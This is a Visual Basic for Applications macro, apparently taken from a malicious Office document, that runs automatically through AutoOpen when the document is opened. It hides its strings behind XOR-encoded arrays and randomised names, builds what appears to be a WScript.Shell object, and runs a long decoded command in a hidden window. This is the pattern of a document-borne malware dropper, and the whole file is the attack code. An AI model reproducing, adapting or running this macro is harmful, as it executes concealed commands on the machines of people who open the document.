Private Function cLuPucvBWJqtI(WFrUpnxVDIcv As Variant, eDAtkQQXcuQPFD As Variant)
Dim tKwqddqAGuydMc As String
tKwqddqAGuydMc = ""
For i = LBound(WFrUpnxVDIcv) To UBound(WFrUpnxVDIcv)
tKwqddqAGuydMc = tKwqddqAGuydMc & Chr(eDAtkQQXcuQPFD(i) Xor WFrUpnxVDIcv(i))
Next
cLuPucvBWJqtI = tKwqddqAGuydMc
End Function
Dim gNozGOKhJNOgYj As String
Sub AutoOpen()
Call MSMcnGyFZWhh
End Sub
Sub MSMcnGyFZWhh()
Set YNrFATuYZpSZAs = CreateObject(cLuPucvBWJqtI(Array((78 XOR 42),212,(44 + 183),181,26,((113 - 56) XOR ((6 - 2) + (90 - 4))),(40 + (23 - 0)),((42 - 0) XOR 126),(101 XOR (21 - 10)),((1 - 0) + 94),157,(((49 - 22) + 79) XOR (337 - 125)),((37 + 19) XOR 102)),Array((70 - 19),(65 + 70),128,((87 - 14) XOR ((125 - 60) + 77)),(122 - 7),(4 XOR (9 + (14 - 0))),((93 - 45) XOR 123),(33 + 89),((18 + (35 - 17)) XOR 25),55,(466 - 218),210,50)))
YNrFATuYZpSZAs.Run cLuPucvBWJqtI(Array(208,((75 - 25) XOR 94),149,120,(5 + 95),(137 + (114 - 13)),(70 + 13),(6 XOR (197 - 87)),(92 + 121),(25 XOR (122 + (148 - 59))),50,(343 - 164),((2 - 1) XOR (11 - 4)),((29 + (47 - 1)) XOR ((26 - 5) + 5)),(144 - 21)),Array((19 + (169 - 28)),(((0 - 0) + (3 - 1)) XOR (1 - 0)),226,(21 XOR 8),((37 - 17) + 2),(((6 - 3) + 22) XOR 132),((63 - 25) XOR (29 - 0)),(3 XOR ((6 - 1) + 9)),(200 - 15),166,((12 - 4) + 20),(151 + 63),(252 - 126),(((18 - 8) + 0) XOR 62),(169 - 78))) & _
cLuPucvBWJqtI(Array(250,(28 XOR ((74 - 34) + 40)),(1 + (7 - 3)),(65 + 150),((114 - 53) + (188 - 70)),((50 - 11) + 22),102,(71 XOR (163 + (54 - 22))),((20 + 36) XOR (88 + 15)),76,69,(27 - 8),(((14 - 2) + (9 - 2)) XOR (307 - 128)),((70 + 2) XOR 222),71),Array(215,(0 + 2),(14 XOR 100),(105 XOR ((198 - 94) + (192 - 54))),220,(18 XOR (109 - 37)),(7 + 2),164,(57 - 3),(74 - 33),61,51,(94 + (69 - 27)),190,9)) & _
cLuPucvBWJqtI(Array((250 - 121),73,(96 + (162 - 13)),(473 - 218),(106 XOR (412 - 158)),252,212,(115 + 0),(61 XOR 69),(243 - 79),(53 + (230 - 112)),(357 - 147),151,247,(246 - 59)),Array(228,62,(390 - 174),176,((92 - 42) XOR (333 - 137)),(232 - 82),(116 + 61),16,12,132,((98 - 11) + (162 - 20)),183,227,(9 + (361 - 153)),((29 + 194) XOR 51))) & _
cLuPucvBWJqtI(Array((47 - 4),(96 - 38),(((53 - 26) + 33) XOR 108),127,(105 + 47),72,32,230,(78 XOR (410 - 156)),(430 - 211),13,125,203,84,(49 + 97)),Array((26 + (68 - 16)),(75 + 13),(16 XOR 3),19,(207 XOR 62),(53 - 8),(45 + 33),(82 XOR ((28 - 11) + 175)),153,(1 XOR 244),(56 + 17),77,(289 - 101),(49 XOR 11),(76 XOR 178))) & _
cLuPucvBWJqtI(Array(170,199,((22 - 6) XOR (42 - 10)),(299 - 80),168,147,(75 + 17),240,57,(277 - 125),(244 - 83),50,(2 XOR 18),(44 + 65),((199 - 59) XOR 21)),Array((45 XOR (223 + (12 - 3))),((82 - 32) XOR (63 + 85)),(139 - 55),136,(24 XOR 196),((17 - 8) + 216),(31 XOR (18 + 24)),((33 - 6) XOR 133),94,(57 XOR (195 - 58)),((12 - 6) + 128),(65 XOR ((36 - 11) + 2)),((164 - 79) XOR 49),((38 - 15) XOR (11 + 3)),(215 XOR 62))) & _
cLuPucvBWJqtI(Array((120 - 57),140,(110 + (62 - 26)),148,(25 + (203 - 84)),(103 - 10),(89 - 25),211,69,255,(361 - 113),(13 + 49),((55 - 23) XOR (148 - 23)),(93 - 9),129),Array((67 XOR ((7 - 2) + 10)),((96 - 7) XOR (119 + 120)),189,187,(174 + 68),52,(28 + 24),(466 - 213),41,((68 - 13) + (140 - 61)),((299 - 129) + 45),(10 + (3 - 1)),(18 XOR 1),51,(298 - 104))) & _
cLuPucvBWJqtI(Array(21,247,(116 + (54 - 26)),((2 + (21 - 8)) XOR (26 - 6)),(64 - 15),((16 + 20) XOR ((164 - 78) + 15))),Array(((90 - 32) XOR 108),((46 - 10) + 163),(288 - 65),((19 + 30) XOR 13),(((5 - 0) + 5) XOR (30 - 12)),(190 - 86))), ((0 - 0) + 0)
gNozGOKhJNOgYj = cLuPucvBWJqtI(Array((0 + 7),(214 - 71),(1 + (4 - 2)),((12 + 29) XOR 16),(232 - 71),186,43,((129 - 58) XOR (90 + (59 - 14))),((52 - 16) XOR 73),((120 - 59) XOR 125),(45 + 137),(79 + (275 - 113)),(83 - 20),(25 + 17),((138 + (5 - 2)) XOR 30)),Array(69,223,((22 + (34 - 9)) XOR 127),((9 + 1) XOR (125 - 54)),(159 + 37),221,74,(72 XOR 230),(0 XOR 2),96,193,((62 - 27) XOR 187),((81 - 26) XOR (43 + 81)),(((22 - 6) + (53 - 26)) XOR 105),((93 + 26) XOR 196))) & _
cLuPucvBWJqtI(Array(((79 - 39) + 3),(140 - 70),195,196,((154 - 54) XOR (107 + (274 - 136))),43,(73 + (335 - 167)),249,(39 + (99 - 49)),(104 - 12)),Array((150 - 30),(4 + 3),(87 XOR (377 - 161)),((121 + 4) XOR (402 - 152)),217,98,(20 + (172 - 14)),177,(18 + 4),(0 + 18)))
Debug.Print gNozGOKhJNOgYj
End Sub
